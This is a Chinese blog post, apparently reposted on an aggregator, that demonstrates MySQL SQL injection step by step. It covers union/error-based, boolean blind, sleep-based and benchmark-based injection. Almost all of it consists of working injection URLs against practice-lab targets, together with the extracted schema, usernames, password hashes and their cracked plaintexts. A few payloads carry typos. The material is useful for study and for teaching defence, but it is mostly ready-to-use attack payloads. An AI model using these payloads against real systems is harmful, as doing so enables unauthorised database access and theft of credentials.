Mysql常见注入

Posted zzh%100

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Mysql常见注入相关的知识,希望对你有一定的参考价值。

mysql显错注入

1.判断注入类型为字符型:http://219.153.49.228:43074/new_list.php?id=tingjigonggao‘ and 1=1 --+
2.判断字段为4:http://219.153.49.228:43074/new_list.php?id=tingjigonggao‘ order by 4--+
3.union报错:http://219.153.49.228:43074/new_list.php?id=tingjigonggao‘ and 1=2 union select 1,2,3,4 --+
4.爆当前数据库和版本:http://219.153.49.228:43074/new_list.php?id=tingjigonggao‘ and 1=2 union select 1,database(),version(),4 --+
数据库:mozhe_discuz_stormgroup
版本:10.2.15-MariaDB-log
5.继续判断其它数据库:union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit *,1(*为0~n,直到页面返回为空)
数据库
information_schema
mozhe_discuz_stormgroup
mysql
performance_schema
test
6.爆mozhe_discuz_stormgroup库中表:union select 1,TABLE_NAME,3,4 from information_schema.TABLES where TABLE_SCHEMA=‘需要查的数据库名‘ limit *,1(*为0~n,直到页面返回为空)
notice
stormgroup_member
7.爆stormgroup_member表中字段:union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA=‘mozhe_discuz_stormgroup‘ and TABLE_NAME=‘stormgroup_member‘ limit *,1(*为0~n,直到页面返回为空)
id
name
password
status
8.爆字段中的数据:union select 1,CONCAT(id,‘-‘,name,‘-‘,password,‘-‘,status),3,4 from mozhe_discuz_stormgroup.stormgroup_member limit *,1(*为0~n,直到页面返回为空)
1-mozhe-46e65165c36b3167530b4837a605f086-1
md5解密后:1-mozhe-389699-1
2-mozhe-356f589a7df439f6f744ff19bb8092c0-0
md5解密后:2-mozhe-dsan13-0
注:status状态为0,账户不可用

Mysql布尔值盲注

1.数据库长度:http://219.153.49.228:42875/new_list.php?id=1 and length(database())=10 --+
2.爆数据库名:
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),1,1))=115 --+  s  
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),2,1))=116 --+  t
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),3,1))=111--+   o
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),4,1))=114--+   r
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),5,1))=109--+   m
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),6,1))=103--+   g
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),7,1))=114--+   r
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),8,1))=111--+   o
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),9,1))=117--+   u
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),10,1))=112--+  p
数据库名:stormgroup

3.爆表名:
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=‘stormgroup‘ limit 0,1),1,1))=109 --+           m

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=‘stormgroup‘ limit 0,1),2,1))=101 --+            e

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=‘stormgroup‘ limit 0,1),3,1))=109 --+            m

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=‘stormgroup‘ limit 0,1),4,1))=98 --+              b   

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=‘stormgroup‘ limit 0,1),5,1))=101 --+           e

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=‘stormgroup‘ limit 0,1),6,1))=114 --+           r

表一:member

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from     information_schema.tables where table_schema=‘stormgroup‘ limit 1,1),1,1))=110 --+          n

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=‘stormgroup‘ limit 1,1),2,1))=111 --+          o

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=‘stormgroup‘ limit 1,1),3,1))=116 --+          t

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=‘stormgroup‘ limit 1,1),4,1))=105 --+          i

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=‘stormgroup‘ limit 1,1),5,1))=99 --+           c

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=‘stormgroup‘ limit 1,1),6,1))=101 --+         e

表二:notice

3.爆字段:
http://219.153.49.228:42875/new_list.php?id=1 and length((select column_name from information_schema.columns where table_name=‘member‘ and table_schema=‘stormgroup‘ limit 0,1))=4 --+                 长度为4

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select column_name from information_schema.columns where table_name=‘member‘ and table_schema=‘stormgroup‘ limit 0,1),1,1))=110 --+             n
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select column_name from information_schema.columns where table_name=‘member‘ and table_schema=‘stormgroup‘ limit 0,1),2,1))=97 --+               a
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select column_name from information_schema.columns where table_name=‘member‘ and table_schema=‘stormgroup‘ limit 0,1),2,1))=109 --+             m
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select dump from information_schema.columns where table_name=‘member‘ and table_schema=‘stormgroup‘ limit 0,1),2,1))=101 --+             e
字段一:name

http://219.153.49.228:42875/new_list.php?id=1 and length((select column_name from information_schema.columns where table_name=‘member‘ and table_schema=‘stormgroup‘ limit 1,1))=8 --+

字段二:猜想为password

字段三
http://219.153.49.228:42875/new_list.php?id=1 and length((select column_name from information_schema.columns where table_name=‘member‘ and table_schema=‘stormgroup‘ limit 2,1))=6 --+   长度为6,猜想字段名为status(显示1账户可用,0不可用)

4.爆字段内容:
先爆status字段内容:
http://219.153.49.228:42875/new_list.php?id=1 and length((select CONCAT(status) from stormgroup.member limit 0,1))=1 --+          长度为一
http://219.153.49.228:42875/new_list.php?id=1 andascii(substr((select CONCAT(name) from stormgroup.member limit 0,1),1,1))=48 --+         0
账户状态为0不可用

http://219.153.49.228:42875/new_list.php?id=1 and length((select CONCAT(status) from stormgroup.member limit 1,1))=1 --+           长度为一
http://219.153.49.228:42875/new_list.php?id=1 andascii(substr((select CONCAT(name) from stormgroup.member limit 1,1),1,1))=49 --+         1
 账户状态为1可用

name字段
http://219.153.49.228:42875/new_list.php?id=1 and length((select CONCAT(name) from stormgroup.member limit 1,1))=5 --+             长度为5
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select CONCAT(name) from stormgroup.member limit 1,1),1,1))=109 --+     m

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select CONCAT(name) from stormgroup.member limit 1,1),2,1))= 111--+      o

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select CONCAT(name) from stormgroup.member limit 1,1),3,1))=122 --+       z
.......猜想库名为mozhe


password字段
http://219.153.49.228:42875/new_list.php?id=1 and length((select CONCAT(password) from stormgroup.member limit 1,1))=32 --+            长度为32。。。。晕,太多了,上sqlmap,拿32位md5值。


Mysql延时注入

判断是否存在注入

http://10.0.0.21/yanci.php?username=root‘ and sleep(5)%23

或者

http://10.0.0.21/yanci.php?username=root‘ and sleep(5) and ‘xRsl‘=‘xRsl#

 

Sleep函数注入查询当前数据库名的第一个符号

http://10.0.0.21/yanci.php?username=root‘ and If(ascii(substr(database(),1,1))=114,1,sleep(5))#

替换database()为其他符号时可以查询其他信息,如:

1.爆数据库的版本长度

http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1‘and If(length((version()))=6,sleep(10),1)--+

2.爆数据库版本的第一个字符

http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1‘and If(ascii(substr(version(),1,1))=53,sleep(10),1)--+

3.爆第一个数据库的长度

http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1‘and If(length((select schema_name from information_schema.schemata limit 0,1))=18,sleep(10),1)--+

4.爆第一个数据库的第一个字符

http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1‘and If(ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=105,sleep(10),1)--+

这里通过改变limit后的值来确定第几个数据库,第一个数据库的下标为0,依次往后推就是其他的数据库

5.爆security数据库里的第四个表的长度

http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1‘and If(length((select table_name from information_schema.tables where table_schema=‘security‘ limit 3,1))=5,sleep(10),1)--+

6.爆security数据库里的第四个表的第一个字符

http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1‘and If(ascii(substr((select table_name from information_schema.tables where table_schema=‘security‘ limit 3,1),1,1))=117,sleep(10),1)--+

7.爆security数据库里的users表的第二个字段长度

http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1‘and If(length((select column_name from information_schema.columns where table_schema=‘security‘ and table_name=‘users‘ limit 1,1))=8,sleep(10),1)--+

8.爆security数据库里的users表的第二个字段的第一个字符

http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1‘and If(ascii(substr((select column_name from information_schema.columns where table_schema=‘security‘ and table_name=‘users‘ limit 1,1),1,1))=117,sleep(10),1)--+

9.爆security数据库里的users表的第二个字段的第一个数据的长度
http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1‘and If(length((select username from security.users limit 0,1))=4,sleep(10),1)--+

Benchmark()函数基于时间延迟注入

BENCHMARK(count,expr) 函数重复count次执行表达式expr,它可以用于计时MySQL处理表达式有多快,结果值总是0

1、判断注入点

http://127.0.0.1:4609/?id=1 and if(1=0,1, sleep(10)) --+ 

 

2、判断数据库版本第一个字符是否为 5 ?

http://127.0.0.1:4610/?id=1 and if(left(version(),1)=5,(select benchmark(10000000,md5(0x41))),1) --+

 

3、判断数据库连接用户名长度是否为 18?

http://127.0.0.1:4610/?id=1 and if(length(user())=18,(select benchmark(10000000,md5(0x41))),1) --+

 

4、判断用户名前18个字符是否为 sql_user@localhost ?

http://127.0.0.14610/?id=1 and if(left(user(),18)=‘sql_user@localhost‘,(select benchmark(10000000,md5(0x41))),1) --+

 

5、判断数据库名长度是否为 6?

http://127.0.0.1:4610/?id=1 and if(length(database())=6,(select benchmark(10000000,md5(0x41))),1) --+

 

6、判断数据库名第一个字符是否为 s?

http://127.0.0.14610/?id=1 and if(ascii(substring((database()),1,1))=115,(select benchmark(10000000,md5(0x41))),1) --+

 

依次类推......

 --------------------------------------------------

7、判断表名长度是否为 4 ?

http://127.0.0.1:4610/?id=1 andif(length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=4,(select benchmark(10000000,md5(0x41))),1) --+

 

8、判断表名第一个字符是否为 f ?

http://127.0.0.1:4610/?id=1 and if(left((select table_name from information_schema.tables wheretable_schema=database() limit 1,1),1)=‘f‘,(select benchmark(10000000,md5(0x41))),1) --+

 

依次类推......

  --------------------------------------------------

9、判断列名长度是否为 4?

http://127.0.0.1:4610/?id=1 and if(length((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x666c6167 limit 1,1))=4,(select benchmark(10000000,md5(0x41))),1) --+

 

10、判断列名第一个字符是否为 f ?

http://127.0.0.1:4610/?id=1 and if(left((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x666c6167 limit 1,1),1)=‘f‘,(select benchmark(10000000,md5(0x41))),1) --+

 

依次类推......

 --------------------------------------------------

11、判断字段内容值长度是否为 14?

http://127.0.0.1:4610/?id=1 and if(length((select flag from flag limit 0,1))=14,(select benchmark(10000000,md5(0x41))),1) --+

 

12、判断列名字段内容值第一位字符是否为 w ?

http://127.0.0.1:4610/?id=1 and if(left((select flag from flag limit 0,1),1)=‘w‘,(select benchmark(10000000,md5(0x41))),1) --+

或者

http://127.0.0.1:4610/?id=1 andif(ascii(substring((SELECT flag FROM flag),1,1))=119,(select benchmark(10000000,md5(0x41))),1) --+

以上是关于Mysql常见注入的主要内容,如果未能解决你的问题,请参考以下文章

以下代码片段是不是容易受到 Rails 5 中 SQL 注入的影响?

MyBatis如何防止SQL注入

MyBatis怎么防止SQL注入

合集SQL注入提权

mybatis以及预编译如何防止SQL注入

初识Spring源码 -- doResolveDependency | findAutowireCandidates | @Order@Priority调用排序 | @Autowired注入(代码片段